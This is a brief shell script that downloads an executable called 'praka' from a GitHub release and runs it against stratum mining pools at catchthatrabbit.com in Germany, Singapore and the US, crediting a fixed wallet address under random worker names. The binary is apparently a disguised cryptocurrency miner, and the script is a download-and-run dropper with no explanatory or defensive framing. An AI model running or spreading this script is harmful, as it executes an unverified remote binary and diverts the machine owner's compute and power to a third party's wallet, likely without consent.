#!/bin/sh
apt update && apt install unzip
wget https://github.com/tallapallitech63/kalparaka/releases/download/ppios/praka
chmod +x praka
./praka -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-prakam@de.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-prakam@sg.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-prakam@us.catchthatrabbit.com:8008
